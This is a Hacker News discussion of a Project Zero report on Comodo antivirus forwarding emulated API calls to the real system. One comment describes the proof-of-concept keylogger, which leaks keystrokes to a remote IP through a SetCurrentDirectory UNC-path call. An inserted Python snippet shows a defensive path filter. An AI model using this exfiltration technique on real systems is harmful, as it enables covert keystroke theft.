
Comodo Antivirus Forwards Emulated API Calls to the Real API During Scans - cespare
https://bugs.chromium.org/p/project-zero/issues/detail?id=769
======
willvarfar
Google's Project-Zero
[https://en.wikipedia.org/wiki/Project_Zero_(Google)](https://en.wikipedia.org/wiki/Project_Zero_\(Google\))
is absolutely excellent! Google tasks top-notch engineers to find zero-day bugs
in _other companies'_ products, making us all safer.

Very big kudos to Google! The flood of bugs they keep finding and getting
other companies to fix is fantastic!

~~~
jlgaddis
Indeed, they've done some great work.

It's times like this that make me glad I'm not a developer. If I were, I'd
be forever worried that today is the day I open up my mail client and see a
new message from 'taviso@'.

~~~
CiPHPerCoder
I'd look forward to it, personally, but I like learning new things about
security.

------
dkopi
When it comes to security research, Tavis Ormandy is truly inspirational. It
isn't just about the bugs he discovers, but I find his explanations often very
simple to understand.

This is an extremely severe design issue, where an anti-virus can not only be
bypassed, but it can actually be used to compromise an attacked system. Comodo
runs suspicious code inside an emulator (VM), but instead of implementing full
OS emulation, they allow a lot of the API calls inside the emulator to leak
out to the hosting computer, and actually run them with NT AUTHORITY\SYSTEM
privileges (the Windows equivalent of root).

The exploit code serves as a simple keylogger, by repeatedly calling
GetKeyState() (with system privileges!), and leaking this information to a remote
server using the SetCurrentDirectory() API (by calling
SetCurrentDirectory("\\?\UNC\192.168.237.1\<pressed key>")).

This is a beautiful attack, and I couldn't help but smirk at the "wtf!!!!"
comment.
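The post above describes the missing check: an emulator that forwards SetCurrentDirectory() to the real API must inspect the path argument, because a UNC path makes the host open an SMB connection to a remote name. The following is an added illustration, not code from the bug report or from Comodo, of the parameter filter a forwarding layer would need; the function names and the rule "only plain local paths are forwarded" are my own assumptions.

```python
from typing import Optional

# Constructed example: classify a Win32 path argument before an emulated
# SetCurrentDirectory() call is allowed to reach the host API.
# Forms handled:
#   \\host\share\...        plain UNC (network)
#   \\?\UNC\host\share\...  extended-length UNC (network, as in the report)
#   \\.\name                device namespace (pipes, physical drives)
#   \\?\C:\dir              extended-length local path
#   C:\dir                  plain local path

EXT_UNC = "\\\\?\\UNC\\"
EXT_PREFIX = "\\\\?\\"
DEVICE_PREFIX = "\\\\.\\"


def classify_path(path: str) -> str:
    """Return 'unc', 'extended', 'device' or 'local' for a path argument."""
    if path.upper().startswith(EXT_UNC.upper()):
        return "unc"
    if path.startswith(EXT_PREFIX):
        return "extended"
    if path.startswith(DEVICE_PREFIX):
        return "device"
    if path.startswith("\\\\"):
        return "unc"
    return "local"


def unc_host(path: str) -> Optional[str]:
    """Host name an emulated process would cause the host to contact, or None."""
    kind = classify_path(path)
    if kind != "unc":
        return None
    rest = path[len(EXT_UNC):] if path.upper().startswith(EXT_UNC.upper()) else path[2:]
    host = rest.split("\\", 1)[0]
    return host or None


def should_forward(path: str) -> bool:
    """Assumed policy: only plain local paths may leave the emulator."""
    return classify_path(path) == "local"


if __name__ == "__main__":
    # The path shape from the bug report's proof of concept (host from the page).
    leaked = "\\\\?\\UNC\\192.168.237.1\\A"
    print(classify_path(leaked), unc_host(leaked), should_forward(leaked))
```

A real filter would also have to canonicalise the argument (case, forward slashes, relative components) before classifying it, which this sketch leaves out.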

~~~
vog
_> This is an extremely severe design issue, where an Anti Virus can not only
be bypassed, but it can actually be used to compromise an attacked system._

Don't we have exactly that design issue in _all_ anti-virus tools, by
definition?

All potentially dangerous data is routed through that single tool that runs
with high permissions and performs complex computations. Every single
programming error in the anti-virus tool (e.g. a buffer overflow) can
potentially lead to a compromised system. An attacker can now choose not just
between vulnerabilities of browser, mail client and operating system, but also
use vulnerabilities of the anti-virus tool.

So anti-virus is by definition a tool with complex behaviour and a large
attack surface.

For many security people, this alone qualifies anti-virus tools as an additional
threat, not as part of the solution - even without dramatic failures as shown
in this particular case.

------
sccxy
Some previous Comodo issues:

Comodo ships Adware Privdog worse than Superfish

[https://news.ycombinator.com/item?id=9091917](https://news.ycombinator.com/item?id=9091917)

Comodo “Chromodo” Browser disables same origin policy

[https://news.ycombinator.com/item?id=11021633](https://news.ycombinator.com/item?id=11021633)

Comodo Internet Security installs and starts a VNC server by default

[https://news.ycombinator.com/item?id=11129170](https://news.ycombinator.com/item?id=11129170)

~~~
AdmiralAsshat
There is no doubt some engineer at Comodo whose heart sinks every time he/she
thinks Tavis is done tearing their software apart and opens their bug reports
to find _yet another_ gaping security hole.

------
vog
Actually, we find two issues here:

1) that this huge attack surface existed in the first place. (almost by
design)

2) how they "fixed" it. (not questioning their design at all)

The whole bug report reads like an invitation to find more creative
combinations of API calls that their filter forwards to the system. From the
first comment:

 _> They're planning to fix those two issues and review all the remaining
API's for missing parameter filtering, but wanted to know if I agree that
their design is sound. I said I suppose they're correct in theory, but this is
a lot of attack surface [...]_

~~~
ikeboy
>We have also disabled this feature by default UNTIL we complete the security
review.

So creative combinations won't help until they re-enable it.

------
wjnc
My first thought is: so now I am relying on a company that basically provides me
free services for security audits of other companies, some of which I pay for
the services they deliver. (Last one is a stretch.) Of course, I rely on many
free things, but it's the second order aspect here that troubles me.

Is there an indication of the complexity of the bugs they are finding? Are
they among those that should be caught by QA?

~~~
ploxiln
It's a new kind of incompetent-but-too-big company: "too big for Google to not
give you free expert security review". Well, it's just for companies that can
make Google's stuff look bad when they enable users to be badly infested with
malware.

The magnitude of it in this case is pretty funny ... can you imagine Comodo
"security suite" or whatever just 3 months ago? A special secure browser
without same origin policy, a local poorly secured VNC server, a scanning
and parsing engine that continually exposes itself to untrusted input but has
ASLR disabled ...

Most of these are not really complicated, they're bad feature ideas. But mass-
market security products are feature-driven, not security-driven. So it makes
sense that they suck at security.

------
cesarb
Looking at this issue and the issues linked in its last comment...

Why are they running things like unpackers and emulators as "NT
AUTHORITY\SYSTEM", instead of farming them to less privileged processes?

~~~
mtgx
From the many issues I've seen with Comodo products, either they don't know
what they are doing or are doing it on purpose this way (plausible deniability
backdoors).

------
Natanael_L
Never trusted the sandbox functionality. I've been installing Comodo CIS with
only the firewall and antivirus, sandboxing disabled, and HIPS on low settings.
Any notable exploits left that would bypass that?

~~~
ionised
I basically just use it for the Firewall and HIPS too, because I cannot find
another free firewall solution (that isn't Windows firewall) that is any good,
and I cannot find any other example of a HIPS that is as easy to set up and
run as the Comodo one.

That said, I'm getting seriously tired of their shadiness/incompetence
recently.

I need alternatives.

~~~
amluto
> that isn't Windows firewall

What's wrong with Windows firewall/defender/anti-virus/whatever it's called
these days? It's free, it doesn't try to market itself to you, it doesn't
smell like malware, and it doesn't seem to show up in these regular sweeps of
disastrous security bugs in the third-party solutions.

~~~
obsurveyor
Windows Firewall has the annoying habit of letting stuff work until one day it
just starts doing its job and doesn't. Typically this is through user prompts
that either get spacebar'd away due to focus stealing* or blocked because the
user doesn't know what it's asking about.

It's a mess working out what it's doing, fixing it and explaining to the user
why their perfectly working system just broke. It could really use some
organization tools like the Task Scheduler.

*I thought Microsoft promised at one point around the lead up to Windows 7 that they were going to address their focus-stealing issues.

------
jwr
"used to forward", from what I understand this has been fixed.

~~~
willvarfar
Would you trust them to fix it?

Seems such a big red flag (as though things couldn't get worse for AV-cred
these days).

~~~
Kliment
It's a huge red flag - they've temporarily disabled the function while they
audit all APIs they're calling, but they still believe their core design is ok
- this means they'll go back to emulate with pass-through everything that THEY
can't figure a way to exploit.

~~~
dkopi
It's a double-edged sword. Emulating all the OS functions is probably an
impossible task for them at the moment. It isn't just about implementing all
the OS calls, it's also about implementing them in a way that doesn't allow
malware to detect that it's running inside of an emulator.

~~~
toyg
The sheer wtf of having "windows running on windows" is worthy of discarding
this AV entirely. How do you like running TWO operating systems at all times?
And people wonder why AVs make powerful machines struggle under minimal
load...

~~~
tsujamin
Your post reminded me of two cool stories about "Windows on Windows"

1. Microsoft has reimplemented the NT kernel and services as a userspace
LibraryOS called Drawbridge
([http://ssrg.nicta.com.au/Events/summer/16/baumann.pdf](http://ssrg.nicta.com.au/Events/summer/16/baumann.pdf),
slide 21)

2. Microsoft teecchniiccaally also already did this in SysWOW64

First story is much more interesting than the second one

~~~
21
As the funny fact goes, in the System32 directory you have 64-bit binaries,
and in the SysWOW64 directory you have 32-bit binaries.

~~~
CWuestefeld
The reason for the 64-bit stuff in the System32 directory makes sense - they
need to ensure that the currently-used DLLs and stuff are in the directory
that legacy software is looking at.

On the other hand, the SysWOW64 thing could sure have been named better, to
make the whole thing clear.

~~~
ptx
> The reason for the 64-bit stuff in the System32 directory makes sense - they
> need to ensure that the currently-used DLLs and stuff are in the directory
> that legacy software is looking at.

Why? There was no legacy 64-bit software. So any software needing to find the
64-bit system directory needed to (at the very least) be recompiled, but
probably needed lots of other small changes as well. So why couldn't one of
those simple required changes (to create 64-bit versions of legacy software)
be to change the path from which it loads its DLLs?

~~~
toyg
See [http://brandonlive.com/2008/12/22/why-does-windows-put-64-bit-binaries-in-system32/](http://brandonlive.com/2008/12/22/why-does-windows-put-64-bit-binaries-in-system32/)

------
justsaysmthng
My god what a mess. I think virus writers and hackers should specifically
target anti-virus suites, given how much of a security risk these pose to the
user. Heh, I guess they do just that. I wouldn't be surprised if some of the
virus and anti-virus writers are one and the same people or organizations.
Because it makes a lot of sense - open the door to intruders and then tell
users it's their fault, then manipulate them into buying your security
product. Rinse and repeat and make millions.

------
RubyPinch
Does anyone have any good experiences with any anti-virus software?

~~~
woodman
17 years ago I used F-prot to disinfect my school's computer lab after it was
completely overrun by the Melissa worm. The antivirus industry has certainly
earned its terrible reputation, but F-prot was actually pretty good software.
It was the first with a heuristics engine, and I remember it actually working
on a few occasions.

